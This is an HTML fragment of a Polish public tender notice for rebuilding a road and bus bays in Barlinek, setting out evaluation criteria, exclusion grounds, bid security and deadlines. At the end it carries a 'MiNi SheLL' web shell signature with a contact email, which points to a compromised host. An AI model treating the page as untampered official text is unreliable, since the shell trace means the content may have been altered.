przedstawia taki sam bilans ceny<br/>i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z<br/>najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający wzywa<br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających<br/>nową cenę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do występowania w obrocie gospodarczym,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie spełniony jeśli Wykonawca wykaże, że posiada środki finansowe lub<br/>zdolność kredytową w wysokości nie niższej niż 300.000,00 złotych (słownie: trzysta tysięcy złotych),<br/>4) zdolności technicznej lub zawodowej:<br/>4.1. warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich<br/>5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie) zrealizował co najmniej dwie roboty budowlane polegające na wykonaniu drogi lub innej nawierzchni<br/>utwardzonej z kostki brukowej o powierzchni nie mniejszej niż 200 m 2 każda (przez jedną robotę rozumie się roboty<br/>budowlane wykonane na podstawie jednej umowy);<br/>4.2. Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony,<br/>jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>a) osobą, która będzie pełnić funkcję kierownika budowy (1 osoba) – posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności inżynieryjnej-drogowej bez ograniczeń oraz minimum 5 – letnie doświadczenie<br/>zawodowe w pełnieniu funkcji kierownika budowy/kierownika robót w tej specjalności. Doświadczenie zawodowe należy<br/>liczyć od dnia uzyskania uprawnień w danej specjalności.<br/>b) osobą, która będzie pełnić funkcję kierownika robót elektrycznych, posiadającą uprawnienia do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w co<br/>najmniej ograniczonym zakresie oraz minimum 3 - letnie doświadczenie zawodowe w pełnieniu funkcji kierownika<br/>budowy/kierownika robót w tej specjalności. Doświadczenie zawodowe należy liczyć od dnia uzyskania uprawnień w danej<br/>specjalności.<br/>Nakładające się na siebie okresy pełnienia funkcji kierownika budowy/kierownika robót nie sumują się.<br/>Zamawiający dopuszcza możliwość łączenia poszczególnych funkcji, o ile osoby spełniają warunki określone dla każdej z<br/>funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 7.1, 7.3 SWZ Zamawiający przed udzieleniem zamówienia,<br/>działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym<br/>Wykonawcą, który złoży odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o<br/>przynależności lub braku przynależności do tej grupy kapitałowej stanowi załącznik nr 8 do SWZ),<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>c) oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez Zamawiającego (według wzoru stanowiącego załącznik nr 4 do SWZ), o których<br/>mowa w:<br/>1) art. 108 ust. 1 pkt 3 PZP,<br/>2) art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>3) art. 108 ust. 1 pkt 5 PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>4) art. 108 ust. 1 pkt 6 PZP,<br/>5) art. 109 ust. 1 pkt 1 PZP, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa<br/>w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170),<br/>6) art. 109 ust. 1 pkt 8 i 10 PZP.<br/>d) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>e) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.<br/>1 pkt 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1. SWZ Zamawiający przed udzieleniem zamówienia,<br/>działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych, o<br/>których mowa w lit. a), Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają<br/>spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane (wzór wykazu robót budowlanych stanowi załącznik nr 5 do SWZ). Jeżeli Wykonawca powołuje się na<br/>doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami wykaz dotyczy robót budowlanych, w<br/>których wykonaniu wykonawca ten bezpośrednio uczestniczył. 5-cio letni okres liczy się wstecz od dnia w którym upływa termin<br/>składania ofert,<br/>c) dowodów określających, czy wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie. Dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty.<br/>d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, posiadanych uprawnień,<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę do realizacji<br/>zamówienia stanowi załącznik nr 6 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1 Zamawiający wymaga wniesienia wadium w wysokości 7.000,00 zł (słownie: siedem tysięcy złotych 00/100). Wadium<br/>należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą,<br/>z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>2 Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>3 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku Gospodarczy<br/>Bank Spółdzielczy w Barlinku nr rachunku: 18 8355 0009 0000 0387 2000 0013 z dopiskiem: wadium na zabezpieczenie<br/>oferty w postępowaniu na „Przebudowa drogi - budowa zatok autobusowych przy ul. Niepodległości - Rynek w Barlinku”.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym<br/>Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4 Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5 Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 12.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP.<br/>6 Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7 Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP tj. oświadczenie o spełnieniu warunków udziału w postępowaniu (wg<br/>wzoru stanowiącego załącznik nr 3 do SWZ) oraz o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 2<br/>do SWZ) składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej (tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 10.4. SWZ obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia<br/>5) dokumenty, o których mowa w pkt 10.3. lit. b) i d) SWZ wykonawcy wspólnie ubiegający się o zamówienie składają<br/>wspólnie, natomiast dokumenty, o których mowa w pkt 10.3. lit. a) i c) SWZ składa ten z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, który wykazuje spełnienie warunku udziału w postępowaniu, do którego<br/>wykazania służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w<br/>postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia został zawarty w formularzu ofertowym stanowiącym załącznik nr 1 i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy polegających na wprowadzeniu zmian w zakresie terminu realizacji Przedmiotu Umowy, w<br/>zakresie zmiany sposobu wykonania robót oraz w zakresie zmiany wynagrodzenia. Szczegóły zawiera § 18 ZMIANY<br/>UMOWY we wzorze umowy stanowiącej załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy Zakupowej</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-24 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com